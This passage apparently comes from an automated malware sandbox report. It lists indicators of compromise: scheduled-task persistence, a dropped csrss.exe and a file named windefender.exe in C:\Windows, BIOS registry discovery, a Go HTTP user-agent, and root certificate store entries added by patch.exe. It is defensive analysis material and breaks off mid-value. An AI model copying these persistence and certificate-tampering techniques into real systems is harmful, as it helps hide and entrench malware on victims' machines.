File created	C:\Windows\Tasks\YsLxjqvMZrWymyIEG.job	schtasks.exe
File opened for modification	C:\Windows\rss\csrss.exe	YzkPQgDELwrGtM0OTFyfOecE.exe
File created	C:\Windows\is-7FRI7.tmp	conhost.exe
File created	C:\Windows\Tasks\bwKBwqZYjkqxftWshF.job	schtasks.exe
File created	C:\Windows\rss\csrss.exe	Ga1aWp1y35A2jCNYRRdwYaiw.exe
File created	C:\Windows\unins000.dat	conhost.exe
File created	C:\Windows\Tasks\SMPpzaSdDqsJvHF.job	schtasks.exe
File created	C:\Windows\Tasks\EtrQGzrpWMpnyWxNE.job	schtasks.exe
File opened for modification	C:\Windows\rss	YzkPQgDELwrGtM0OTFyfOecE.exe
File opened for modification	C:\Windows\unins000.dat	conhost.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20240204035515.cab	makecab.exe
File opened for modification	C:\Windows\rss	Ga1aWp1y35A2jCNYRRdwYaiw.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
828	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3040	schtasks.exe
704	schtasks.exe
1824	schtasks.exe
1660	schtasks.exe
2968	schtasks.exe
704	schtasks.exe
1628	schtasks.exe
644	schtasks.exe
1916	schtasks.exe
3044	schtasks.exe
2604	schtasks.exe
2476	schtasks.exe
936	schtasks.exe
2772	schtasks.exe
1556	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

GoLang User-Agent 3 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	114	Go-http-client/1.1
HTTP User-Agent header	249	Go-http-client/1.1
HTTP User-Agent header	252	Go-http-client/1.1

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	mKZWjXr.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	mKZWjXr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	mKZWjXr.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-571 = "China Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-1f-df-43-f7-d9\WpadDetectedUrl	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	mKZWjXr.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	mKZWjXr.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	mKZWjXr.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time"	windefender.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-1f-df-43-f7-d9\WpadDecisionReason = "1"	mKZWjXr.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	Ga1aWp1y35A2jCNYRRdwYaiw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-105 = "Central Brazilian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	YzkPQgDELwrGtM0OTFyfOecE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time"	windefender.exe

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 